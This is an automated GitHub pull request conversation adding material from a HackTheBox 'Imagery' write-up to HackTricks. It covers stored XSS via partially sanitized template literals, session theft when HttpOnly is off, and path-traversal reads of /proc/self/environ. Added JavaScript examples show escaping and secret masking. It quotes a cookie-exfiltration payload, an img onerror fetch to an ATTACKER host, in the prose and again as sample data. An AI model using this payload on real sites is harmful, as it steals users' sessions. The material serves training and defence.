Conversation

@carlospolop
Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

  • Blog URL: https://0xdf.gitlab.io/2026/01/24/htb-imagery.html
  • Blog Title: HTB: Imagery
  • Suggested Section: Pentesting Web -> XSS (stored XSS via innerHTML/template literals + partial DOMPurify) and Pentesting Web -> File Inclusion/Path traversal (directory traversal/arbitrary file read; curl --path-as-is, /proc/self/environ null-byte parsing)

🎯 Content Summary

The post documents compromising the HackTheBox machine Imagery (Linux) by chaining a stored XSS in a bug-report viewer with an admin-only directory traversal / arbitrary file read that enables full source-code disclosure and discovery of further bugs (the post later continues into command injection, cracking, and privesc, but the provided content ends at the beginning of api_edit.py).

1) Recon: exposed services and stack fingerprinting
Two TC...

🔧 Technical Details

Stored XSS via unsanitized template interpolation into innerHTML: if client-side code builds HTML with backticks/template strings and only sanitizes some fields (e.g., DOMPurify.sanitize(report.id), report.name) but injects another field raw (e.g., ${report.details}), an attacker can store HTML/JS that executes when a privileged user views the page. A common exfil payload is <img src=x onerror=fetch('http://ATTACKER/?c='+document.cookie)>, which runs on error and leaks cookies or tokens.

Turning XSS into session hijack when cookies are not HttpOnly: if the application explicitly sets SESSION_COOKIE_HTTPONLY = False (or otherwise omits HttpOnly), JavaScript can read document.cookie. In that case, any XSS in a privileged user’s browser can directly steal the authenticated session cookie, enabling privilege escalation (e.g., user → admin) without needing to f...

🤖 Agent Actions

Summary:

  • Added guidance on exploiting partially sanitized template-literal innerHTML flows for stored DOM XSS, including HttpOnly-disabled Flask session theft considerations, to the DOM XSS page.
  • Documented practical LFI/path traversal exploitation tips using curl --path-as-is, --ignore-content-length, and /proc/self/environ parsing in the File Inclusion guide.
  • Updated references in both pages with the HTB Imagery source.

Tests:

  • Not run (not requested).

This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.
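The partial-sanitization pattern described under Technical Details above, as an added example that is not code from the blog post or from the HackTricks PR: one render function sanitizes `id` and `name` but interpolates `details` raw into a template literal, the other escapes every field. DOMPurify is stood in for by a small HTML escaper so the snippet runs in Node; `renderReportVulnerable`, `renderReportSafe`, `containsActiveContent` and the sample report are assumed names and constructed input.

```javascript
// Added example (not from the blog post or the HackTricks PR): contrasts a
// partially sanitized template-literal render with one that escapes every field.
// All function and field names below are assumptions for illustration.

// Minimal HTML escaping for text nodes and double-quoted attribute values.
// Stands in for DOMPurify.sanitize so the example runs outside a browser.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable pattern: id and name are sanitized, details is interpolated raw.
function renderReportVulnerable(report) {
  return `<div class="report">
  <h3>#${escapeHtml(report.id)} ${escapeHtml(report.name)}</h3>
  <p>${report.details}</p>
</div>`;
}

// Hardened pattern: every user-controlled field goes through the same escaper.
function renderReportSafe(report) {
  return `<div class="report">
  <h3>#${escapeHtml(report.id)} ${escapeHtml(report.name)}</h3>
  <p>${escapeHtml(report.details)}</p>
</div>`;
}

// Review-time check on rendered markup: flags any tag outside the expected set,
// any on* event-handler attribute, or a javascript: URL inside a tag.
// Only tag bodies are inspected, so escaped text such as "&lt;img onerror=" passes.
function containsActiveContent(html, allowedTags = ['div', 'h3', 'p']) {
  const tagRe = /<\s*\/?\s*([a-zA-Z][\w-]*)([^>]*)>/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tagName = m[1];
    const attrs = m[2];
    if (!allowedTags.includes(tagName.toLowerCase())) return true;
    if (/\son[a-z]+\s*=/i.test(attrs)) return true;
    if (/javascript\s*:/i.test(attrs)) return true;
  }
  return false;
}

// Constructed sample report carrying the payload shape the post describes.
const SAMPLE_REPORT = {
  id: 42,
  name: 'Broken image on profile page',
  details: '<img src=x onerror=fetch("http://ATTACKER/?c="+document.cookie)>',
};

// Renders the sample both ways and reports whether each output carries active content.
function demo() {
  const vulnerable = renderReportVulnerable(SAMPLE_REPORT);
  const safe = renderReportSafe(SAMPLE_REPORT);
  return {
    vulnerableIsActive: containsActiveContent(vulnerable),
    safeIsActive: containsActiveContent(safe),
  };
}

if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

In a real page the durable fix is to keep untrusted fields out of `innerHTML` altogether (assign them with `textContent`, or pass each one through DOMPurify, never only some of them), and to leave `HttpOnly` on the session cookie so that a residual XSS cannot read it from `document.cookie`.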
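The `/proc/self/environ` parsing mentioned in the suggested section is about the file's layout: a sequence of NUL-terminated `KEY=VALUE` records. The following is an added example, not code from the blog post or from the PR, that parses that layout and lists which entries look like credentials with their values masked, so a defender can judge what an arbitrary file read of that path would expose. `parseEnviron`, `summariseExposure` and the sample environment are assumed names and constructed data.

```javascript
// Added example (not from the blog post or the PR): parses the NUL-separated
// KEY=VALUE records of a /proc/<pid>/environ file and reports which entries
// look like secrets. Sample data is constructed; names are placeholders.

// Parse a Buffer or string in /proc/self/environ layout into an ordered list.
function parseEnviron(raw) {
  const text = Buffer.isBuffer(raw) ? raw.toString('utf8') : String(raw);
  const entries = [];
  for (const record of text.split('\0')) {
    if (record.length === 0) continue;        // trailing NUL or empty record
    const eq = record.indexOf('=');           // split on the first '=' only
    if (eq <= 0) {                            // malformed: no '=' or empty key
      entries.push({ key: record, value: null, malformed: true });
      continue;
    }
    entries.push({ key: record.slice(0, eq), value: record.slice(eq + 1), malformed: false });
  }
  return entries;
}

// Names that usually carry credentials; used to rank what an exposure would leak.
const SENSITIVE_KEY_RE = /(SECRET|PASSWORD|PASSWD|TOKEN|API_KEY|PRIVATE_KEY|DATABASE_URL)/i;

// Mask a value for a report: keep two characters at each end, hide the rest.
function maskValue(value) {
  if (value.length <= 4) return '*'.repeat(value.length);
  return value.slice(0, 2) + '*'.repeat(value.length - 4) + value.slice(-2);
}

// Return the sensitive-looking entries with masked values.
function summariseExposure(entries) {
  return entries
    .filter((e) => !e.malformed && SENSITIVE_KEY_RE.test(e.key))
    .map((e) => ({ key: e.key, masked: maskValue(e.value) }));
}

// Constructed sample: roughly what a Python web app's process environment might hold.
const SAMPLE_ENVIRON = Buffer.from(
  [
    'PATH=/usr/local/bin:/usr/bin',
    'HOME=/home/web',
    'FLASK_SECRET_KEY=ExampleSecretValue123',
    'DB_PASSWORD=p4ss',
    'NOEQUALS',
    'LANG=C.UTF-8',
  ].join('\0') + '\0',
);

// Parses the sample and returns the record count plus the masked sensitive entries.
function demo() {
  const entries = parseEnviron(SAMPLE_ENVIRON);
  return { count: entries.length, sensitive: summariseExposure(entries) };
}

if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

The mitigation side is the same regardless of how the file is reached: run the web process with secrets injected from a file or secret store rather than the environment where possible, and treat a confirmed read of `/proc/self/environ` as a credential rotation event for every key the summary lists.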

@carlospolop
Collaborator Author

🔗 Additional Context

Original Blog Post: https://0xdf.gitlab.io/2026/01/24/htb-imagery.html

Content Categories: Based on the analysis, this content was categorized under "Pentesting Web -> XSS (stored XSS via innerHTML/template literals + partial DOMPurify) and Pentesting Web -> File Inclusion/Path traversal (directory traversal/arbitrary file read; curl --path-as-is, /proc/self/environ null-byte parsing)".

Repository Maintenance:

  • MD Files Formatting: 944 files processed

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0
